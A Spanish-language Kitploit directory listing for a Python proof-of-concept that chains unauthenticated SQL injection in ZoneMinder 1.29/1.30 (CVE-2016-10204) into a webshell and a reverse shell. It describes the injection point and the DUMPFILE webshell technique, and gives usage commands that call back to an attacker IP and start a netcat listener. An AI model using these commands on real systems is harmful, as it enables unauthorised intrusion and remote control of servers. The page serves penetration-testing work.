Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
zoneminder-1.29-1.30-rce-exploit — Inyección SQL no autenticada a exploit RCE para ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). PoC en Python de SQLi a webshell a reverse shell con un solo comando. | Kitploit
Herramientas/GitHubGitHub/akash0x00/zoneminder-1.29-1.30-rce-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHubakash0x00/zoneminder-1.29-1.30-rce-exploit

zoneminder-1.29-1.30-rce-exploit

Inyección SQL no autenticada a exploit RCE para ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). PoC en Python de SQLi a webshell a reverse shell con un solo comando.

Ver Repositorio
hace 17h 39mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de SQLi a RCE para ZoneMinder 1.29/1.30

Un exploit de Python listo para ejecutar para ZoneMinder 1.29/1.30 que encadena la inyección SQL no autenticada (CVE-2016-10204, EDB-41239) hasta llegar a una shell inversa interactiva.

Este es un PoC weaponizado/automatizado para un CVE conocido y parcheado, no un exploit nuevo.

El PoC de EDB para este bug se detiene en el payload de SQLi o en "apuntar sqlmap a él". Este exploit empaqueta la cadena completa de SQLi a webshell a shell en un solo script legible.

Qué hace

  1. Confirma la inyección con una sonda basada en tiempo (SLEEP) sobre el parámetro POST limit de index.php?view=request&request=log&task=query.
  2. Escribe una pequeña webshell PHP en la raíz web mediante SELECT ... INTO DUMPFILE, probando varias rutas comunes de ZoneMinder/Apache.
  3. Sondea la webshell activa y luego lanza una shell inversa bash hacia tu listener de netcat.

Los dos inconvenientes que maneja

  • DUMPFILE, no OUTFILE. OUTFILE escapa los saltos de línea y destroza el PHP multilínea; DUMPFILE escribe bytes sin procesar, por lo que la webshell permanece válida.
  • Nombre de archivo aleatorio nuevo en cada ejecución. MySQL se niega a sobrescribir un archivo existente, por lo que un nombre fijo colisiona con un archivo obsoleto de una ejecución anterior.

Uso

root@kitploit:~
# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443

# start your listener when prompted, in another terminal
sudo nc -lvnp 443

# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php

Créditos

  • FOXMOLE (base del aviso para CVE-2016-10204).
  • PoC original: Exploit-DB 41239.

Licencia

MIT, ver LICENSE.

Descargar herramienta